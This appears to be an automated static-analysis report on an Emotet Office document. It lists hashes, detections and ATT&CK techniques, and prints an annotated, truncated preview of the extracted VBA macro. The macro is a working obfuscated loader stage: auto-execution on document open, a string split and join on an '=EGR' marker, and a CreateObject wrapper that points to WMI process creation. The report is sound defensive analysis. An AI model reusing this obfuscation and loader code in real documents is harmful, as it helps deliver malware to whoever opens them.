Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 6d531c0d2bfa1887…

MALICIOUS

Office (OLE)

133.3 KB Created: 2020-10-14 19:03:00 Authoring application: Microsoft Office Word (these OLE summary-information fields are written by whoever produced the document and are trivially forged; do not use them for attribution or timeline evidence)
MD5: 11b0f54bc91433a5b5bfbe9d071ace69 SHA-1: 8655a060437fde424972cc54085965445910d980 SHA-256: 6d531c0d2bfa18875d304220ef3fc95e74bd8f98c539ceb1755245c2394e0b31
202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The extracted source shows the string-assembly stage of the loader: obfuscated literals are split on the `=EGR` marker (`V7pw_9kod2g`) and re-joined (`Fyzdoclgiitpv`), and the visible fragments read `winmgmt…:win32_…rocess`, with the missing characters pulled from a UserForm control caption (`….Pages(1).Caption`) and another form property that are not part of the VBA source stream. That is consistent with the second stage being launched through WMI (`winmgmts:` / `Win32_Process`) via the `CreateObject` wrapper (`Dhelx0f9ndh`) rather than a direct `Shell` call; the actual command line is not recoverable from this preview and should be confirmed by dynamic analysis or by dumping the form's control properties. The ClamAV detection explicitly identifies the file as Emotet.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-9778091-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-9778091-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard OOXML DrawingML XML-namespace URI found in virtually every modern Office document; it is neither a download location nor a C2 indicator and should not be promoted to an IOC.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas
35ba581a7d07c242723817cd679240b29046cc2a7f4485862374591738596dda
vba-macro oletools.olevba.extract_macros (decoded VBA source) 9454 bytes
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "O3qkgeo3axj"
' Standard module holding the three deobfuscation/execution helpers
' (Join, CreateObject, Split) called by the form module further down.
' All function and variable names are randomly generated; none carry meaning.
Function Fyzdoclgiitpv(Yz_oszab8r4yqbk)
' Deobfuscation helper: rebuilds a string from an array of fragments.
' The only live statement is the Join below; every Dim/ReDim/arithmetic
' assignment around it is dead "junk code" inserted to pad the module and
' defeat signature matching -- it can be ignored during analysis.
' Q_2rf4brbqy_ is not assigned anywhere in the extracted source shown here,
' so Join would run with an Empty delimiter (coerced to ""), i.e. the
' fragments are concatenated back-to-back. NOTE(review): confirm it is not
' set in a part of the source that was truncated from this preview.
On Error Resume Next   ' swallow any runtime error so the chain keeps running
   Dim mpwuI()
ReDim mpwuI(1)
mpwuI(0) = 3445 + 6732
Dim JFRbg()
ReDim JFRbg(3)
JFRbg(0) = 99 + 8871
JFRbg(1) = 1 + 5891
JFRbg(2) = 279 + 4
Dim BldwC()
ReDim BldwC(1)
BldwC(0) = 93 + 146
' The real work: array of string pieces -> single string.
Fyzdoclgiitpv = Join(Yz_oszab8r4yqbk, Q_2rf4brbqy_)
   Dim ntjwcEAJd()
ReDim ntjwcEAJd(2)
ntjwcEAJd(0) = 6 + 14241
ntjwcEAJd(1) = 5491 + 39
Dim aWxSqEh()
ReDim aWxSqEh(1)
aWxSqEh(0) = 9 + 7
Dim vfBzJ()
ReDim vfBzJ(3)
vfBzJ(0) = 6033 + 81491
vfBzJ(1) = 1 + 51
vfBzJ(2) = 322 + 6
End Function
Function Dhelx0f9ndh(E0c5gl6od5d55)
' Object-instantiation helper: a thin wrapper around CreateObject so the
' ProgID/moniker never appears next to the call as a literal. The argument
' is assembled at runtime by the caller; the "=EGR"-encoded fragments in
' module Sahhp8qg6vx spell out a winmgmts:/win32_process style string, which
' points at WMI process creation as the execution primitive -- confirm the
' exact value passed here with dynamic analysis. Everything except the Set
' line is junk padding.
On Error Resume Next   ' a failed CreateObject returns Nothing silently
   Dim YJLjmBJ()
ReDim YJLjmBJ(1)
YJLjmBJ(0) = 6 + 233
Dim EltfI()
ReDim EltfI(3)
EltfI(0) = 2 + 6721
EltfI(1) = 5 + 851
EltfI(2) = 1 + 788
Dim AOlTn()
ReDim AOlTn(2)
AOlTn(0) = 5 + 9861
AOlTn(1) = 318 + 63
' The real work: instantiate whatever COM object/moniker the caller built.
Set Dhelx0f9ndh = CreateObject(E0c5gl6od5d55)
   Dim MsfZJYiB()
ReDim MsfZJYiB(1)
MsfZJYiB(0) = 5 + 7274
Dim rbIIE()
ReDim rbIIE(3)
rbIIE(0) = 5616 + 97961
rbIIE(1) = 7 + 51
rbIIE(2) = 101 + 8
Dim PEbqDED()
ReDim PEbqDED(2)
PEbqDED(0) = 639 + 301
PEbqDED(1) = 704 + 5
End Function
Function V7pw_9kod2g(N3l4_2mdbgzj2)
' Deobfuscation helper: splits an encoded literal on the "=EGR" marker.
' The string literals in module Sahhp8qg6vx interleave "=EGR" between the
' real characters (e.g. "=EGRro=EGR=EGRce=EGRs=EGRs=EGR"); splitting on
' that marker yields the real characters plus empty elements, which the
' Join helper (Fyzdoclgiitpv) then concatenates back into plaintext.
' "=EGR" is the per-sample obfuscation key and a usable static signature.
' Everything except the Split line is junk padding.
On Error Resume Next
   Dim zqpety()
ReDim zqpety(1)
zqpety(0) = 100 + 2
Dim DtGqEJHRF()
ReDim DtGqEJHRF(2)
DtGqEJHRF(0) = 59 + 41
DtGqEJHRF(1) = 7 + 4
Dim IescrC()
ReDim IescrC(2)
IescrC(0) = 72 + 11
IescrC(1) = 24 + 8
' The real work: encoded literal -> array of fragments.
V7pw_9kod2g = Split(N3l4_2mdbgzj2, "=EGR")
   Dim hasmw()
ReDim hasmw(1)
hasmw(0) = 2 + 86
Dim ZyPIEFJV()
ReDim ZyPIEFJV(3)
ZyPIEFJV(0) = 4 + 31
ZyPIEFJV(1) = 68 + 31
ZyPIEFJV(2) = 1 + 371
Dim xyoKZqCC()
ReDim xyoKZqCC(1)
xyoKZqCC(0) = 962 + 9121
End Function

Attribute VB_Name = "Sahhp8qg6vx"
Attribute VB_Base = "0{066E2C3A-7DB1-4A15-8C09-FCC32355ED11}{630D8C15-F56F-4457-BE93-C863FF930789}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' VB_Base plus VB_PredeclaredId = True mark this as a designer (UserForm-style)
' module rather than a plain code module. The code below reads control
' properties off the form (e.g. ….Pages(1).Caption) to obtain pieces of the
' command string; those values live in the form's designer stream, not in
' the VBA source, so they are absent from this macros.bas extraction and must
' be recovered separately (e.g. olevba --deobf or dumping the form storage).
Function Q4xosdyaga102a4y()
On Error Resume Next
   Dim szmOASXOm()
ReDim szmOASXOm(3)
szmOASXOm(0) = 6 + 71
szmOASXOm(1) = 5688 + 6951
szmOASXOm(2) = 3 + 3
Dim QgTZV()
ReDim QgTZV(2)
QgTZV(0) = 8 + 11
QgTZV(1) = 2933 + 9
Dim RMvKHkaGF()
ReDim RMvKHkaGF(1)
RMvKHkaGF(0) = 493 + 82
Ne43lo8oou5a = F1k8d87mk3_a96wl + "=EGRro=EGR=EGRce=EGRs=EGRs=EGR" + Zhzw8qz34i5xai7c
   Dim iEOEB()
ReDim iEOEB(2)
iEOEB(0) = 87 + 661
iEOEB(1) = 8 + 8
Dim gvnlAE()
ReDim gvnlAE(3)
gvnlAE(0) = 41 + 4311
gvnlAE(1) = 8159 + 29261
gvnlAE(2) = 14 + 8117
Dim HADPBGH()
ReDim HADPBGH(2)
HADPBGH(0) = 9 + 51
HADPBGH(1) = 69 + 26
Fa8ipl2k6tptb4yt = Wrvyced5hln6 + "=EGR=EGR:=EGRw=EGRin=EGR=EGR3=EGR2=EGR_=EGR" + S6_r5d8bljwf
   Dim MIpOFBA()
ReDim MIpOFBA(3)
MIpOFBA(0) = 3 + 61
MIpOFBA(1) = 4385 + 81
MIpOFBA(2) = 5 + 1
Dim HvAGVEHHC()
ReDim HvAGVEHHC(3)
HvAGVEHHC(0) = 7 + 91
HvAGVEHHC(1) = 3 + 201
HvAGVEHHC(2) = 141 + 513
Dim ecNAlEII()
ReDim ecNAlEII(1)
ecNAlEII(0) = 7 + 790
N3l4_2mdbgzj2 = Rb1ktd93_f2_8 + "=EGR=EGRw=EGRi=EGRnm=EGR=EGRgm=EGRt=EGR=EGR" + P3zfl9vu0xu
   Dim vVnZH()
ReDim vVnZH(3)
vVnZH(0) = 11 + 591
vVnZH(1) = 1692 + 88531
vVnZH(2) = 7 + 9
Dim WmzZkjHCT()
ReDim WmzZkjHCT(2)
WmzZkjHCT(0) = 25 + 11
WmzZkjHCT(1) = 1 + 2466
Dim zRrBDZ()
ReDim zRrBDZ(2)
zRrBDZ(0) = 98 + 51
zRrBDZ(1) = 373 + 860
Dtpls80_al4 = Sahhp8qg6vx.D4ksgrggkdrf7zmyk.Pages(1).Caption
   Dim LthRXwJ()
ReDim LthRXwJ(1)
LthRXwJ(0) = 9 + 3305
Dim NOvwHGDB()
ReDim NOvwHGDB(3)
NOvwHGDB(0) = 1 + 7761
NOvwHGDB(1) = 8 + 81
NOvwHGDB(2) = 418 + 9
Dim Zuurp()
ReDim Zuurp(3)
Zuurp(0) = 9 + 38171
Zuurp(1) = 3170 + 21
Zuurp(2) = 3404 + 3735
S5oie8s498u1hh = N3l4_2mdbgzj2 + Dtpls80_al4 + Fa8ipl2k6tptb4yt + Sahhp8qg6vx.K7ya3mkemcee + Ne43lo8oou5a
   Dim RBsCGDzFP()
ReDim RBsCGDzFP(3)
RBsCGDzFP(0) = 8 + 21
RBsCGDzFP(1) = 76 + 5981
RBsCGDzFP(2) = 4 + 9536
Dim rsSKdH()
ReDim rsSKdH(3)
rsSKdH(0) = 56 + 961
rsSKdH(1) = 8521 + 41
rsSKdH(2) = 922 + 4300
Dim nUtqJGH()
ReDim nUtqJGH(3)
nUtqJGH(0) =
... (truncated)